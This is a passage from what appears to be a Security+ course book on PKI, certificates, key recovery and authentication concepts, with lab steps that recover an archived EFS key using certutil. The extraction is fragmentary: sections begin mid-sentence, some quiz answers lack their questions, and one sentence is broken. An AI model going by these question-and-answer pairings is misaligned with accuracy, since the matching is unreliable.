e) In the Site Bindings dialog box, select the http entry, then select Remove. Confirm
by selecting Yes. Select the Close button.
f) Switch to the DC1 VM and observe the web server certificate in the Issued
Certificates folder.
Note: The Policy Module tab in the CA server properties dialog box is used to
configure whether all certificates must be manually approved or not.
Individual certificate templates can be set to auto-issue or require
administrator approval.
5. Test the certificate by browsing the website from the PC1 VM.
a) Open a connection window for the PC1 VM and sign in as 515support\Administrator
with the password Pa$$w0rd
b) Press Windows+R then in the Run dialog box, type https://MS1.corp.515support.com
and select OK.
An error is displayed because this URL does not match the subject name configured
in the certificate.
c) Change the URL to updates.corp.515support.com and the 515 Support User Portal
page should show correctly.
d) Close the browser.
6. Use DC1 to revoke the certificate and observe the effect on browsing the site.
a) Switch to the DC1 VM and observe the web server certificate in the Issued
Certificates folder. Right-click the certificate and select All Tasks→Revoke
Certificate.
b) From the Reason code box, select Cease of Operation. Leave the date and time set
to the current time and select Yes to confirm.
c) Right-click the Revoked Certificates folder and select Properties. Note that the next
publication of a delta CRL is set for the next day. Select Cancel.
d) Press Windows+R to open the Run dialog box, then type certsrv.msc /e and press
Enter.
e) In the new console, expand the server to view the Certificate Revocation List folder.
You can view the CRLs and the certificates they revoke here.
f) Switch to the PC1 VM and browse https://updates.corp.515support.com again. Is
any warning displayed?
If you want to revoke certificates very quickly, you have to configure the CRL
publishing periods before you issue certificates. The problem with publishing CRLs
more often is that it consumes more bandwidth and slows down client access.
Summary
This lesson covered the basics of cryptographic security systems.
• Understand the uses of different cryptographic products and how to select an
appropriate algorithm for a given scenario.
• You should be able to assess the risks posed by attacks on cryptographic systems.
A: Answers will vary. Some organizations use internal certificate services for
authentication and confidentiality. This can provide better security than systems
based only on passwords, but comes with its own management challenges. Most
will also rely on TLS to protect web and email services, though this may be
handled by a hosting company and not managed directly. When security is
outsourced like this, it is important to monitor the service provider to make sure
they are following best security practices in terms of cipher suite selection and
product updates (to try to eliminate implementation issues). A lot of
organizations may be using cryptography without actively configuring it, such as
storing password hashes. It can be difficult to identify the algorithms used for
this, but doing so is important.
Have any of the attacks mentioned in this lesson been launched against your
organization? Did the cryptographic systems in place prevent the attacks from
being successful? Why or why not?
LESSON INTRODUCTION
Digital certificates and public key infrastructure (PKI) are critical to manage identification,
authentication, and data confidentiality across most private and public networks. This
infrastructure is critical to the security of most data processing systems, so it is important that you
be able to apply effective management principles when configuring and supporting these systems.
LESSON OBJECTIVES
In this lesson, you will:
• Implement certificates and certificate authorities.
• Implement PKI management.
Topic A
Implement Certificates and Certificate
Authorities
EXAM OBJECTIVES COVERED
6.4 Given a scenario, implement public key infrastructure.
The process of exchanging encrypted transmissions between two parties is built upon
a well-defined structure of interconnected servers that provide a suite of cryptographic
services. Everything from encrypted communications within a company's private
network, to the encrypted communications of the global Internet, are wrapped up in
public key infrastructures (PKI). The basic building blocks of PKI include digital
certificates and certificate authorities.
DIGITAL CERTIFICATES
A digital certificate is essentially a wrapper for a subject's public key. As well as the
public key, it contains information about the subject and the certificate's issuer or
guarantor. The certificate is digitally signed to prove that it was issued to the subject by
a particular CA. The subject could be a human user (for certificates allowing the signing
of messages, for instance) or a computer server (for a web server hosting confidential
transactions, for instance).
Digital certificates are based on the X.509 standard approved by the International
Telecommunications Union. This standard is incorporated into the Internet
Engineering Taskforce's RFC 5280 (http://tools.ietf.org/html/rfc5280) and several
related RFCs. The Public Key Infrastructure (PKIX) working group manages the
development of these standards. RSA also created a set of standards, referred to as
Public Key Cryptography Standards (PKCS), to promote the use of public key
infrastructure.
Field Usage
Version The X.509 version supported (V1, V2, or V3).
Serial Number A number uniquely identifying the certificate within the
domain of its CA.
Signature Algorithm The algorithm used by the CA to sign the certificate.
Issuer The name of the CA, expressed as a distinguished name (DN).
Valid From/To Date and time during which the certificate is valid.
Subject The name of the certificate holder, expressed as a
distinguished name (DN).
Public Key Public key and algorithm used by the certificate holder.
Extensions V3 certificates can be defined with extended attributes, such as
friendly subject or issuer names, contact email addresses, and
intended key usage.
The certificate fields are expressed as object identifiers (OIDs), using the syntax defined
in Abstract System Notation One (ASN.1). Certificate extensions, defined for version 3
of the X.509 format, allow extra information to be included about the certificate. An
extension consists of:
• Extension ID (extnID)—expressed as an OID.
• Critical—a Boolean (True or False) value indicating whether the extension is critical.
• Value (extnValue)—the string value of the extension.
Public certificates can use standard extensions; that is, an OID defined in the X.509
documentation, which all clients should support. Certificates issued for private use can
use private, proprietary, or custom extensions, but may need dedicated or adapted
client and server software to interpret them correctly.
Requesting a certificate. The CA has made several user-type certificate templates available with
different key usage specifications (encrypting files, signing emails, encrypting emails, and so on).
(Screenshot used with permission from Microsoft.)
CERTIFICATE FORMATS
There are various formats for encoding a certificate as a digital file for exchange
between different systems. All certificates use an encoding scheme called
Distinguished Encoding Rules (DER) to create a binary representation of the
information in the certificate. A DER-encoded binary file can be represented as ASCII
characters using Base64 Privacy-enhanced Electronic Mail (PEM) encoding. The file
extensions .CER and .CRT are also often used, but these can contain either binary DER
or ASCII PEM data.
Base64-encoded .CER file opened in Notepad. (Screenshot used with permission from Microsoft.)
Additionally, the .PFX or .P12 (PKCS #12) format allows the export of a certificate along
with its private key. This would be used to archive or transport a private key. This type of
file format is password-protected. The private key must be marked as exportable.
The P7B format implements PKCS #7, which is a means of bundling multiple
certificates in the same file. It is typically in ASCII format. This is most often used to
deliver a chain of certificates that must be trusted by the processing host. It is
associated with the use of S/MIME to encrypt email messages. P7B files do not contain
the private key.
CERTIFICATE AUTHORITIES
The certificate authority (CA) is the person or body responsible for issuing and
guaranteeing certificates. Private CAs can be set up within an organization for internal
communications. Most network operating systems, including Windows Server®, have
certificate services. For public or business-to-business communications, however, the
CA must be trusted by each party. Third-party CA services include Comodo, Digicert,
GlobalSign, and Symantec's family of CA brands (VeriSign, GeoTrust, RapidSSL, and
Thawte). The functions of a CA are as follows:
• Provide a range of certificate services useful to the community of users serviced by
the CA.
• Ensure the validity of certificates and the identity of those applying for them
(registration).
• Establish trust in the CA by users and government and regulatory authorities and
enterprises, such as financial institutions.
• Manage the servers (repositories) that store and administer the certificates.
• Perform key and certificate lifecycle management.
Microsoft Windows Server CA. (Screenshot used with permission from Microsoft.)
Note: On a private network (such as a Windows domain), the right to issue certificates of
different types must be carefully controlled. The Windows CA supports access permissions
for each certificate type so that you can choose which accounts are able to issue them.
CERTIFICATE POLICIES
Certificate policies define the different uses of certificate types issued by the CA,
typically following the framework set out in RFC 2527 (http://www.ietf.org/rfc/
rfc2527.txt). As an example of a policy, you could refer to the US federal government's
common policy framework for PKI (https://idmanagement.gov/topics/fpki/).
Certificate templates for Windows Server CA. (Screenshot used with permission from Microsoft.)
Different policies will define different levels of secure registration and authentication
procedures required to obtain the certificate. A general purpose or low-grade
certificate might be available with proof of identity, job role, and signature. A
commercial grade certificate might require in-person attendance by the authorized
person. A CA will issue many different types of certificates, designed for use in different
circumstances.
CAs that are automatically trusted by browsers that apparently validate their identities
as financial institutions.
Differently graded certificates might be used to provide levels of security; for example,
an online bank requires higher security than a site that collects marketing data.
• Domain Validation (DV)—proving the ownership of a particular domain. This may
be proved by responding to an email to the authorized domain contact or by
publishing a text record to the domain. This process can be highly vulnerable to
compromise.
Domain validation certificate. Only the padlock is shown and the browser reports that the owner is
not verified. (Screenshot used with permission from Microsoft.)
• Extended Validation (EV)—subjecting to a process that requires more rigorous
checks on the subject's legal identity and control over the domain or software being
signed. EV standards are maintained by the CA/Browser forum (https://
cabforum.org).
Extended validation certificate from GlobalSign with the verified owner shown in green next to the
padlock. (Screenshot used with permission from GlobalSign, Inc.)
• When creating a web server certificate, it is important that the subject matches the
Fully Qualified Domain Name (FQDN) by which the server is accessed, or browsers
will reject the certificate. If using multiple certificates for each subdomain is
impractical, a single certificate can be issued for use with multiple subdomains in
the following ways:
• Subject Alternative Name (SAN)—the subdomains are listed as extensions. If a
new subdomain is added, a new certificate must be issued.
• Wildcard domain—the certificate is issued to the parent domain and will be
accepted as valid for all subdomains (to a single level). Wildcard certificates
cannot be issued with Extended Validation (EV).
• Both these methods can cause problems with legacy browser software and some
mobile devices. There is also greater exposure for the servers operating each
subdomain should the certificate be compromised. Using separate certificates for
each subdomain offers better security.
Microsoft's website certificate configured with alternative subject names for different subdomains.
(Screenshot used with permission from Microsoft.)
MACHINE/COMPUTER CERTIFICATES
It might be necessary to issue certificates to machines (servers, PCs, smartphones, and
tablets), regardless of function. For example, in an Active Directory domain, machine
certificates could be issued to Domain Controllers, member servers, or even client
workstations. Machines without valid domain-issued certificates could be prevented
from accessing network resources. Machine certificates might be issued to network
appliances, such as routers, switches, and firewalls.
EMAIL/USER CERTIFICATES
An email certificate can be used to sign and encrypt email messages, typically using
S/MIME or PGP. The user's email address must be entered in the Subject Alternative
Name (SAN) extension field. On a directory-based local network, such as Windows
Active Directory, there may be a need for a wider range of user certificate types. For
example, in AD there are user certificate templates for standard users, administrators,
smart card logon/users, recovery agent users, and Exchange mail users (with separate
templates for signature and encryption). Each certificate template has different key
usage definitions.
ROOT CERTIFICATE
The root certificate is the one that identifies the CA itself. The root certificate is self-
signed. A root certificate would normally use a key size of at least 2048 bits. Many
providers are switching to 4096 bits.
SELF-SIGNED CERTIFICATES
Any machine, web server, or program code can be deployed with a self-signed
certificate. Self-signed certificates will be marked as untrusted by the operating
system or browser, but an administrative user can choose to override this.
Note: To learn more, watch the related Video on the course website.
Activity 5-1
Discussing Certificates and Certificate
Authorities
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
The owner's public key and the algorithms used for encryption and hashing.
The certificate also stores a digital signature from the issuing CA, establishing
the chain of trust.
That the application processing the certificate must be able to interpret the
extension correctly. Otherwise, it should reject the certificate.
3. What type of certificate format can be used if you want to transfer your
private key from one host computer to another?
The subject generates a key pair then adds the public key along with subject
information and supported algorithms and key strengths to a certificate signing
request (CSR) and submits it to the CA. If the CA accepts the request, it puts the
public key and subject information into a certificate and signs it to guarantee its
validity.
5. You are developing a secure web application. What sort of certificate should
you request to show that you are the publisher of a program?
6. What extension field is used with a web server certificate to support the
identification of the server by multiple subdomain labels?
Topic B
Implement PKI Management
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.3 Given a scenario, troubleshoot common security issues.
6.2 Explain cryptography algorithms and their basic characteristics.
6.4 Given a scenario, implement public key infrastructure.
As a security professional, you are very likely to have to install and maintain PKI
certificate services for private networks. You may also need to obtain and manage
certificates from public PKI providers. This topic will help you to install and configure
PKI and to issue, troubleshoot, and revoke certificates.
destroyed, the data encrypted using that key will be inaccessible, unless there is a
backup or key recovery mechanism.
If the private key or secret key used to encrypt data is lost or damaged, the encrypted
data cannot be recovered unless a backup of the key has been made. A significant
problem with key storage is that if you make multiple backups of a private key, it is
exponentially more difficult to ensure that the key is not compromised. On the other
hand, if the key is not backed up, the storage system represents a single point of
failure. Key Recovery defines a secure process for backing up keys and/or recovering
data encrypted with a lost key. This process might use M-of-N control to prevent
unauthorized access to (and use of) the archived keys. Escrow means that something
is held independently. In terms of key management, this refers to archiving a key (or
keys) with a third party. This is a useful solution for organizations that don't have the
capability to store keys securely themselves, but it invests a great deal of trust in the
third party.
Note: Historically, governments have been sensitive about the use of encryption
technology (clearly, it is as useful to terrorists, criminals, and spies as it is to legitimate
organizations). In the 1990s, the US government placed export controls on strong keys
(128-bit and larger). It also tried to demand that all private keys were held in escrow, so
as to be available to law enforcement and security agencies. This proposal was defeated
by powerful counter arguments defending civil liberty and US commercial interests. Such
arguments have resurfaced as governments and their security agencies attempt to
restrict the use of end-to-end encryption and try to insert backdoors into encryption
products.
EXPIRATION
When a key has expired, it is no longer valid or trusted by users. An expired key can
either be archived or destroyed. Destroying the key offers more security, but has the
drawback that any data encrypted using the key will be unreadable. Whether a key is
archived or destroyed will largely depend on how the key was used. In software terms,
a key can be destroyed by overwriting the data (merely deleting the data is not secure).
A key stored on hardware can be destroyed by a specified erase procedure or by
destroying the device.
CRLs published by Windows Certificate Services—The current CRL contains one revoked certificate.
(Screenshot used with permission from Microsoft.)
One of the problems with OCSP is that the job of responding to requests is resource
intensive and can place high demands on the issuing CA running the OCSP responder.
There is also a privacy issue, as the OCSP responder could be used to monitor and
record client browser requests. OCSP stapling resolves these issues by having the
SSL/TLS web server periodically obtain a time-stamped OCSP response from the CA.
When a client submits an OCSP request, the web server returns the time-stamped
response, rather than making the client contact the OCSP responder itself.
SINGLE CA
In this simple model, a single CA issues certificates to users; users trust certificates
issued by that CA and no other. The problem with this approach is that the single CA
server is very exposed. If it is compromised, the whole PKI collapses.
A certification path. The leaf certificate (www.globalsign.com) was issued by an intermediate Extended
Validation CA, and that CA's certificate was issued by the root CA. (Screenshot used with permission
from Microsoft.)
Another problem is that there is limited opportunity for cross-certification; that is, to
trust the CA of another organization. Two organizations could agree to share a root CA,
but this would lead to operational difficulties that could only increase as more
organizations join. In practice, most clients are configured to trust multiple root CAs.
CERTIFICATE PINNING
When certificates are used by a transport protocol, such as SSL/TLS, there is a
possibility that the chain of trust between the client, the server, and whatever
intermediate and root CAs have provided certificates can be compromised. If an
adversary can substitute a malicious but trusted certificate into the chain (using some
sort of proxy or Man-in-the-Middle attack), they could be able to snoop upon the
supposedly secure connection.
Certificate pinning refers to several techniques to ensure that when a client inspects
the certificate presented by a server or a code-signed application, it is inspecting the
proper certificate. This might be achieved by embedding the certificate data in the
application code or by submitting one or more public keys to an HTTP browser via an
HTTP header, which is referred to as HTTP Public Key Pinning (HPKP).
CERTIFICATE ISSUES
The most common problem when dealing with certificate issues is that of a client
rejecting a server certificate (or slightly less commonly, an authentication server
rejecting a client's certificate).
• If the problem is with an existing certificate that has been working previously, check
that the certificate has not expired or been revoked or suspended.
• If the problem is with a new certificate, check that the key usage settings are
appropriate for the application. Some clients, such as VPN and email clients, have
very specific requirements for key usage configuration. Also check that the subject
name is correctly configured and that the client is using the correct address. For
example, if a client tries to connect to a server by IP address instead of FQDN, a
certificate configured with an FQDN will be rejected.
• If troubleshooting a new certificate that is correctly configured, check that clients
have been configured with the appropriate chain of trust. You need to install root
and intermediate CA certificates on the client before a leaf certificate can be
trusted. Be aware that some client applications might maintain a different
certificate store to that of the OS.
• In either case, verify that the time and date settings on the server and client are
synchronized. Incorrect date/time settings are a common cause of certificate (and
other) problems.
From a security point of view, you must also audit certificate infrastructure to ensure
that only valid certificates are being issued and trusted. Review logs of issued
certificates periodically. Validate the permissions of users assigned to manage
certificate services. Check clients to ensure that only valid root CA certificates are
trusted. Make sure clients are checking for revoked or suspended certificates.
PGP/GPG ENCRYPTION
PGP stands for Pretty Good Privacy, which is a popular open standard for encrypting
email communications and which can also be used for file and disk encryption. It
supports the use of a wide range of encryption algorithms. PGP actually exists in two
versions. The PGP Corporation develops a commercial product (now owned by
Symantec®). However, PGP has also been ratified as an open Internet standard with the
name OpenPGP (RFC 4880). The principal implementation of OpenPGP is Gnu Privacy
Guard (GPG), which is available for Linux® and Windows® (gpg4win). The commercial
and open versions of PGP are broadly compatible. In OpenPGP, for encrypting
messages (symmetric encryption), you can use 3DES, CAST, Blowfish/Twofish, AES, or
IDEA. For signing messages and asymmetric encryption, you can use RSA, DSA, or
ElGamal. OpenPGP supports MD5, SHA, and RIPEMD cryptographic hash functions.
To use PGP, a user needs to install PGP software (usually available as a plug-in for the
popular mail clients). The user then creates his or her own certificate. In order to
provide some verification that a certificate is owned by a particular user, PGP operates
a web of trust model (essentially users sign one another's certificates).
The contents of X.509 and PGP certificates are similar. The main difference is that PGP
certificates can be signed by multiple users, while X.509 certificates are signed by a
single CA. PGP certificates can also store more "friendly" information about the user
(though this type of data could be added using attribute extensions to X.509
certificates).
Note: To learn more, watch the related Video on the course website.
Activity 5-2
Discussing PKI Management
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What are the potential consequences if a company loses a private key used
in encrypted communications?
2. What is an HSM?
6. What trust model enables users to sign one another's certificates, rather
than using CAs?
The web of trust model. You might also just refer to this as PGP encryption.
HTTP Public Key Pinning (HPKP) ensures that when a client inspects the
certificate presented by a server or a code-signed application, it is inspecting the
proper certificate by submitting one or more public keys to an HTTP browser via
an HTTP header.
Activity 5-3
Deploying Certificates and
Implementing Key Recovery
SCENARIO
If a private key is lost, any data encrypted using that key will become completely
inaccessible. To mitigate against this eventuality, you can configure a key recovery
agent, who can restore a private key from an archive (in the Active Directory database,
for instance) to the user's computer. As well as configuring key recovery, in this activity
you will explore options for deploying certificates to users automatically using Group
Policy. This activity is designed to test your understanding of and ability to apply
content examples in the following CompTIA Security+ objective:
• 6.4 Given a scenario, implement public key infrastructure.
to recovering a user's archived key. You might use data recovery agents as well as key
recovery agents. For this activity, you will focus on key recovery.
f) Right-click the Certificate Templates folder and select New→Certificate Template
to Issue.
g) Select Key Recovery Agent and select OK.
h) Leave the Certification Authority console open.
Choosing a certificate to use for key recovery. (Screenshot used with permission from
Microsoft.)
e) Select OK in each dialog box, and then when you are prompted to restart CA services,
select Yes.
4. If you have to issue a lot of certificates, approving each one manually is not
practical. You can rely on the network authentication mechanism to ensure that
only valid users receive certificates and issue them automatically using a Group
Policy object (GPO). In the next part of this activity, you will configure a user
template that supports key archiving and a GPO that autoenrolls all domain users
with a user certificate. Configure a user certificate by copying an existing template
and configuring the new template for autoenrollment.
a) In the Certification Authority console, right-click the Certificate Templates folder
and select Manage.
This console enables you to configure and select new types of certificates for the CA
to issue.
b) In the Certificate Templates Console window, right-click the User template and
select Duplicate Template.
c) In the Properties of New Template dialog box, on the General tab, in the Template
display name box, adjust the text to read User—515support. Verify that the Publish
certificate in Active Directory check box is checked, and then select the Apply
button.
You can also set the validity and renewal periods here.
d) On the Request Handling tab, check the Archive subject's encryption private key
check box, and then select OK to acknowledge the prompt.
e) Verify that the option to allow private keys to be exported is checked.
If this is disabled, the private key remains locked to the device that generated it. You
can also set the purpose of the certificate here.
f) Select the Apply button.
g) Select and examine the Cryptography tab.
This is where you can specify which Cryptographic Service Providers (CSP) are
supported (and the minimum key size). The requesting computer will use the CSP to
generate a key pair and store the private key. In the vast majority of cases, you would
not change this from the default of Microsoft Enhanced Cryptographic Provider.
h) Select and examine the Issuance Requirements tab.
This is where you can set administrative controls over issuing the certificate. You
could require multiple administrators to sign the certificate, for instance. As
mentioned earlier, approval adds administrative burden, so it's typically configured
only for more important types of certificates.
i) Select and examine the Security tab.
This is where you can define the accounts that can access the certificate.
j) Select the Domain Users account, then in the Permissions for Domain Users
section, in the Allow column, check the Autoenroll check box.
Configuring certificate template security settings. (Screenshot used with permission from
Microsoft.)
k) Select OK and close the Certificate Templates Console window.
l) In the Certification Authority console, right-click the Certificate Templates folder
and select New→Certificate Template to Issue.
m) Select User—515support and select OK.
f) Check the Renew expired certificates and Update certificates check boxes.
6. In this part of the activity, you will use the account of an ordinary domain user
named Sam, who will encrypt some private documents and then get into
difficulties.
EFS uses a symmetric key called the File Encryption Key (FEK) to bulk encrypt and decrypt
data files. To ensure that the FEK is accessible only to the authorized user, it is encrypted
using the public key in the user's certificate. This means that the linked private key must be
present to decrypt the FEK and use it to decrypt the data again.
a) Restart the PC1 VM.
b) Select the Other user icon and sign in as Sam with the password Pa$$w0rd
c) Open File Explorer and browse to C:\LABFILES, then create a subfolder called
SECRETS and add and edit a few text and picture files.
d) Right-click the SECRETS folder and select Properties.
e) Select the Advanced button and check Encrypt contents to secure data. Select OK.
f) In the SECRETS Properties dialog box, select the Apply button. In the Confirm
Attribute Changes box, select OK.
g) Select the Advanced button again, and then select the Details button.
You can see the certificate used to authorize access and that a recovery certificate has
been created.
7. At this point, assume that Sam moved her exported key to a USB stick and put the
USB stick somewhere safe. A few months later ... the stick is gone! Sam reaches
out to the technical support department for help in recovering the missing key.
Perform a key recovery operation.
a) On the PC1 VM, sign in as 515support\Administrator and try to view the files that Sam
created.
Not even administrators can view encrypted files without the appropriate key.
b) Try to remove the encryption property from one of the files in the SECRETS folder.
c) When that doesn't succeed, cancel out of any dialog boxes.
d) Select Start→Windows Administrative Tools→Certification Authority. In the error
box, select OK.
e) In the console, right-click Certification Authority (Local) and select Retarget
Certification Authority. Select Another computer, type dc1 and then select Finish.
f) Expand the server and select the Issued Certificates folder.
As you can see, Sam has been issued with two certificates. When the original was
deleted, the autoenrollment process issued a replacement automatically. It is
important to realize that this replacement certificate could NOT provide access to the
files encrypted with the old certificate.
g) Double-click the first 515support\Sam certificate. Select the Details tab, and then
select the Thumbprint field.
The value should match the one you recorded earlier.
h) Select the Serial number field. Select the value in the box below it, and press CTRL
+C.
i) Select OK.
j) Open a command prompt as administrator and run the following command, right-
clicking to paste the value of the serial number between the quotes:
certutil -getkey "SerialNumber" c:\LABFILES\samblob
The Key Recovery Agent can now use this "blob" to recover Sam's certificate and
private key. The blob is actually a PKCS #7 file containing the certificate chain plus the
recovered key encrypted using the recovery agent's public key.
k) Run the following command (ignore any line break and type as a single command):
certutil -recoverkey c:\labfiles\samblob c:\LABFILES
\recovered.pfx
l) Enter and confirm Pa$$w0rd as the password when you are prompted.
8. Use the recovered key to reinstall the original certificate and regain access to the
encrypted files.
a) Sign out of the PC1 VM then sign back in as 515support\Sam.
b) Use the Run dialog box to open certmgr.msc.
c) Navigate to Certificates→Personal→Certificates.
You should see that a second certificate was issued. Optionally, you could try to open
a SECRETS file again to test, but it will not work, because this certificate has the same
name but different key material.
d) Right-click the existing certificate and select Delete, then confirm by selecting Yes.
Note: Before doing this in real life, make sure that the new (replacement)
certificate hadn't been used to encrypt more files. You can use the cipher
command-line tool to troubleshoot EFS issues.
e) Right-click in the pane and select All Tasks→Import.
f) On the first page of the wizard, select Next.
g) In the File name text box, type c:\LABFILES\recovered.pfx and select Next.
h) In the Password text box, type Pa$$w0rd and select Next.
i) Select Next, select Finish, and then select OK.
j) Try to open the files in the SECRETS folder—this time it should work.
Summary
This lesson described the components and management issues involved in deploying
digital certificates and public key infrastructure.
• You should be able to distinguish types of digital certificates and be able to export
them in a suitable format to exchange them between different systems.
• Make sure you can describe the components of PKI and how trust relationships are
established.
• You should be aware of key management processes and challenges and be able to
identify the technologies used to revoke certificates.
Why might you implement a PKI and CA hierarchy in your organization, or why is
one already in place?
A: Answers will vary, but a PKI and CA hierarchy ensures that resources in the
organization can establish trust with one another through strong cryptographic
practices. Rather than rely on public or third-party CAs, the organization may set
up their own trust model for internal users and computers to authenticate with
private web servers, application servers, email servers, and more. PKI also
enables the organization to encrypt sensitive data as it traverses the network,
upholding confidentiality in the organization.
What method of backing up private keys would you prefer to use? Why?
A: Answers will vary, but some may prefer using removable backup media to keep
the keys in their physical possession only, whereas others might prefer to
entrust their keys to a third-party escrow that can implement M of N controls.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Each network user and host device must be identified and categorized in certain ways so that you
can control their access to your organization's applications, data, and services. In this lesson, you'll
implement identification and authentication solutions to foster a strong access management
program.
LESSON OBJECTIVES
In this lesson, you will:
• Compare and contrast identity and authentication concepts.
• Install and configure authentication protocols.
• Implement multifactor authentication.
Topic A
Compare and Contrast Identity and
Authentication Concepts
EXAM OBJECTIVES COVERED
4.1 Compare and contrast identity and access management concepts.
Strong authentication is the first line of defense in the battle to secure network
resources. But authentication is not a single process; there are many different
methods and mechanisms, some of which can be combined to form more effective
products. As a network security professional, familiarizing yourself with identification
and authentication technologies can help you select, implement, and support the ones
that are appropriate for your environment.
• Authentication—you need to ensure that customers have unique accounts and that
only they can manage their orders and billing information.
• Authorization—you need rules to ensure customers can only place orders when
they have valid payment mechanisms in place. You might operate loyalty schemes
or promotions that authorize certain customers to view unique offers or content.
• Accounting—the system must record the actions a customer takes (to ensure that
they cannot deny placing an order, for instance).
Note: Historically, the acronym AAA was used to describe Authentication, Authorization,
and Accounting systems. The use of IAAA is becoming more prevalent as the importance
of the identification phase is better acknowledged.
IDENTIFICATION
Identification associates a particular user (or software process) with an action
performed on a network system.
Authentication proves that a user or process is who it claims to be; that is, that
someone or something is not masquerading as a genuine user.
Identification and authentication are vital first steps in the access control process:
• To prove that a user is who he or she says he is. This is important because access
should only be granted to valid users (authorization).
• To prove that a particular user performed an action (accounting). Conversely, a user
should not be able to deny what he or she has done (non-repudiation).
A subject is identified on a computer system by an account. An account consists of an
identifier, credentials, and a profile.
An identifier must be unique. For example, in Windows® a subject may be represented
by a username to system administrators and other users. The username is often
recognizable by being some combination of the user's first and last names or initials.
However, the account is actually defined on the system by a Security Identifier (SID)
string. If the user account was deleted and another account with the same name
subsequently created, the new account would have a new SID and, therefore, not
inherit any of the permissions of the old account.
Credentials means the information used to authenticate a subject when it tries to
access the user account. This information could be a username and password or smart
card and PIN code.
The profile is information stored about the subject. This could include name and
contact details as well as group memberships.
• Ensuring only valid accounts are created—for example, preventing the creation of
dummy accounts or accounts for employees that are never actually hired. The
identity issuance process must be secured against the possibility of insider threats
(rogue administrative users). For example, a request to create an account should be
subject to approval and oversight.
• Secure transmission of credentials—creating and sending an initial password
securely. Again, the process needs protection against snooping and rogue
administrative staff. Newly created accounts with simple or default passwords are
an easily exploitable backdoor.
• Revoking the account if it is compromised or no longer in use.
Identity management refers to the issues and problems that must be overcome in
implementing the identification and authentication system across different networks
and applications.
A particular subject may have numerous digital identities, both within and outside the
company. On a personal level, managing those identities is becoming increasingly
difficult, forcing users into unsecure practices, such as sharing passwords between
different accounts.
These difficulties can be mitigated by two techniques:
• Password reset—automating the password reset process reduces the
administration costs associated with users forgetting passwords but making the
reset process secure can be problematic.
• Single sign-on—this means that all network resources and applications accept the
same set of credentials, so the subject only needs to authenticate once per session.
This requires application compatibility and is difficult to make secure or practical
across third-party networks.
AUTHENTICATION
Assuming that an account has been created securely (the identity of the account
holder has been verified), authentication verifies that only the account holder is able
to use the account, and that the system may only be used by account holders.
Authentication is performed when the account holder supplies the appropriate
credentials to the system. These are compared to the credentials stored on the
system. If they match, the account is authenticated. One of the primary issues with
authentication is unauthorized exposure or loss of the information being used to
authenticate. If a user's credential, such as a password, is exposed, it may be used in
an unauthorized fashion before it can be changed.
There are many different technologies for defining credentials. They can be
categorized as the following factors:
• Something you know, such as a password.
• Something you have, such as a smart card.
• Something you are, such as a fingerprint.
• Something you do, such as making a signature.
• Somewhere you are, such as using a mobile device with location services.
Each has advantages and drawbacks.
(PIN) is also something you know, though long PIN codes are hard to remember and
short codes are too vulnerable for most authentication systems. If the number of
attempts are not limited, it is simple for password cracking software to try to attempt
every combination to brute force a 4-digit PIN.
Something you know authentication is also often used for account reset mechanisms.
For example, to reset the password on an account, the user might have to respond to
challenge questions, such as "What is your favorite color/pet/movie?"
MULTIFACTOR AUTHENTICATION
An authentication product is considered strong if it combines the use of more than one
type of something you know/have/are (multifactor). Single-factor authentication
systems can quite easily be compromised: a password could be written down or
shared, a smart card could be lost or stolen, and a biometric system could be subject
to high error rates or spoofing.
Two-Factor Authentication (2FA) combines something like a smart card or biometric
mechanism with something you know, such as a password or PIN. Three-factor
authentication combines all three technologies, or incorporates an additional location-
based factor. An example of this would be a smart card with integrated fingerprint
reader. This means that to authenticate, the user must possess the card, the user's
fingerprint must match the template stored on the card, and the user must input a PIN
or password.
MUTUAL AUTHENTICATION
Mutual authentication is a security mechanism that requires that each party in a
communication verifies each other's identity. Before the client submits its credentials,
it verifies the server's credentials. Mutual authentication prevents a client from
inadvertently submitting confidential information to a non-secure server. Mutual
authentication helps in avoiding Man-in-the-Middle and session hijacking attacks.
Mutual authentication can be configured on the basis of a password-like mechanism
where a shared secret is configured on both server and client. Distributing the shared
secret and keeping it secure is a significant challenge, however. Most mutual
authentication mechanisms rely on digital certificates and Public Key Infrastructure
(PKI).
Activity 6-1
Discussing Identity and Authentication
Concepts
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
4. What are the four main inputs for something you are technologies?
The most popular biometric factors are fingerprint, iris, retina, and facial
recognition.
You can query the location service running on a device, which may be using GPS
or Wi-Fi to triangulate its position, and you can use a geolocation by IP
database.
Topic B
Install and Configure Authentication
Protocols
EXAM OBJECTIVES COVERED
2.2 Given a scenario, use appropriate software tools to assess the security posture of an
organization.
4.2 Given a scenario, install and configure identity and access services.
6.1 Compare and contrast basic concepts of cryptography.
6.2 Explain cryptography algorithms and their basic characteristics.
Note: For more information, refer to the article about how Windows authentication
works at https://docs.microsoft.com/en-us/windows-server/security/windows-
authentication/credentials-processes-in-windows-authentication.
Passwords are stored using the 56-bit DES cryptographic function. This is not actually a
true hash like that produced by MD5 or SHA but is intended to have the same sort of
effect; the password is used as the secret key. In theory, this should make password
storage secure, but the LM hash process is unsecure for the following reasons:
• Alphabetic characters use the limited ASCII character set and are converted to
upper case, reducing complexity.
• Maximum password length is 14 characters. Long passwords (over seven
characters) are split into two and encrypted separately; this means passwords that
are seven characters or less are easy to identify and makes each part of a longer
password more vulnerable to brute force attacks.
• The password is not "salted" with a random value, making the ciphertext vulnerable
to rainbow table attacks.
NTLM AUTHENTICATION
In Windows NT, the updated NTLM authentication mechanism fixed some of the
problems in LM:
• The password is Unicode and mixed case and can be up to 127 characters long.
• The 128-bit MD4 hash function is used in place of DES.
A substantially revised version of the protocol appeared in Windows NT4 SP4. While
the basic process is the same, the responses are calculated differently to defeat known
attacks against NTLM. An NTLMv2 response is an HMAC-MD5 hash (128-bit) of the
username and authentication target (domain name or server name) plus the server
challenge, a timestamp, and a client challenge. The MD4 password hash (as per
NTLMv1) is used as the key for the HMAC-MD5 function. NTLMv2 also defines other
types of responses that can be used in specific circumstances:
• LMv2—provides pass-through authentication where the target server does not
support NTLM but leverages the authentication service of a domain controller that
